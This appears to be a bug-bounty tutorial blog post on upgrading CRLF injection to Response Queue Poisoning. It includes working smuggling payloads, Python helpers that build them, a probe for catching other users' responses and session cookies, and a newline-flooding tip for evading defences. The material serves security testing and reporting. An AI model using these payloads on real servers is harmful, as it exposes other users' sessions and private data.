Week 57 - Response Queue Poisoning

Did you know you can often upgrade CRLF injection to a critical finding? Many bug bounty programs consider it medium severity, on par with XSS. In this post, I will show you how to make it a P1 through Response Queue Poisoning!

To accomplish this, we first need a way to inject the classic %0d%0a somewhere in the request. I recommend targeting the URL itself or another value that is reflected in the response headers (like the Location header). For reference, %0d%0a decodes to:

Carriage Return = \r (%0d)

Line feed = \n (%0a)

^ Read more about it in one of my previous posts linked in the comments
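To see the encoding in action, here is a quick sanity check using only Python's standard library:

```python
from urllib.parse import quote, unquote

# %0d%0a decodes to the carriage return + line feed pair
assert unquote("%0d%0a") == "\r\n"

# Encoding CRLF yields the same bytes (uppercase hex form)
print(quote("\r\n"))  # %0D%0A
```

Percent-encoding is case-insensitive, so %0d%0a and %0D%0A are equivalent on the wire.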

Now let’s say we discovered the CRLF injection below. Before upgrading the severity, we need to form a clean request with our line breaks. Each %0d%0a represents a line break between headers, and the added Host and Connection headers form a complete request:

GET /%20HTTP/1.1%0d%0aHost:%20redacted[.]net%0d%0aConnection:%20keep-alive%0d%0a%0d%0a HTTP/1.1
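If you want to double-check what the back-end actually parses, decoding the injected path makes the smuggled line breaks visible (redacted.net stands in for the real target):

```python
from urllib.parse import unquote

# The percent-encoded path from the payload above
path = "/%20HTTP/1.1%0d%0aHost:%20redacted.net%0d%0aConnection:%20keep-alive%0d%0a%0d%0a"

# Reconstruct the request line the front-end sends, then decode it
print("GET " + unquote(path) + " HTTP/1.1")
```

The output shows a complete standalone HTTP/1.1 request followed by an empty line, which is exactly what the back-end will treat as a full message.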

We now have a complete request injected into the server. Let’s upgrade this to critical. The request below tells the back-end server to issue two responses: the back-end sees only one request but produces two responses and gets confused:

GET /%20HTTP/1.1%0d%0aHost:%20redacted[.]net%0d%0aConnection:%20keep-alive%0d%0a%0d%0aGET%20/%20HTTP/1.1%0d%0aFoo:%20bar HTTP/1.1

Notice the “Foo: bar” header at the end. Because it has no trailing line break, it absorbs whatever the front-end appends after our injection point (the trailing “ HTTP/1.1” and any remaining headers) into a harmless header value, keeping the smuggled second request valid.
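Here is a rough sketch of building that payload programmatically. The host and the helper name are mine, not part of any tool; the trailing header trick is the key part:

```python
from urllib.parse import quote

def build_rqp_path(host: str) -> str:
    """Build the URL-encoded path that smuggles a second request.

    The trailing 'Foo: bar' header has no final CRLF, so it swallows
    whatever the front-end appends after our injection point.
    """
    smuggled = (
        " HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Connection: keep-alive\r\n"
        "\r\n"
        "GET / HTTP/1.1\r\n"
        "Foo: bar"
    )
    # quote() percent-encodes spaces and CRLF; keep '/' and ':' readable
    return "/" + quote(smuggled, safe="/:")

print(build_rqp_path("redacted.net"))
```

The printed path matches the payload above (modulo uppercase hex), ready to drop into the request line.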

So the server ends up with a response that has no matching request. This extra response is held in the queue until the server receives another request, and is then sent in reply to that one instead. As you can see, this shifts the queue off by one request, and the cycle repeats until the keep-alive connection is terminated.

The end result is intermittently receiving responses intended for other authenticated users and a critical finding for us hackers. This attack is known as Response Queue Poisoning.

If you are having trouble visualizing this, I found a beautiful explanation by PortSwigger I wanted to include:

“As there are no further requests awaiting a response, the unexpected second response is held in a queue on the connection between the front-end and back-end.

When the front-end receives another request, it forwards this to the back-end as normal. However, when issuing the response, it will send the first one in the queue, that is, the leftover response to the smuggled request.

The correct response from the back-end is then left without a matching request. This cycle is repeated every time a new request is forwarded down the same connection to the back-end.”
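One way to confirm the desync in practice is to tag each of your own requests with a unique cache-buster and flag any response that lacks it, since that one was likely meant for someone else. This is a rough sketch under my own assumptions (the marker detection only works if the app reflects the query string somewhere, e.g. in a Location redirect, and the socket I/O is left as comments):

```python
import uuid

def make_probe(host: str) -> tuple[str, str]:
    """Return (marker, raw_request): a keep-alive GET tagged with a
    unique cache-buster so we can recognize our own response."""
    marker = uuid.uuid4().hex
    req = (
        f"GET /?cb={marker} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Connection: keep-alive\r\n"
        "\r\n"
    )
    return marker, req

def looks_foreign(response: str, marker: str) -> bool:
    """A response that does not echo our marker may belong to
    another user's request that slid down the poisoned queue."""
    return marker not in response

# Sketch of the polling loop (real socket I/O omitted):
# sock.sendall(req.encode()); data = sock.recv(65536).decode()
# if looks_foreign(data, marker): save it - it may carry someone
# else's cookies or session tokens
```

Capturing a response with another user's Set-Cookie or session data is the proof-of-concept that turns this into a critical report.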

Note:

If you are having trouble exploiting this, try a large number of newlines; this has been known to bypass some server-side defense mechanisms. Check out the article linked in the comments for more info.
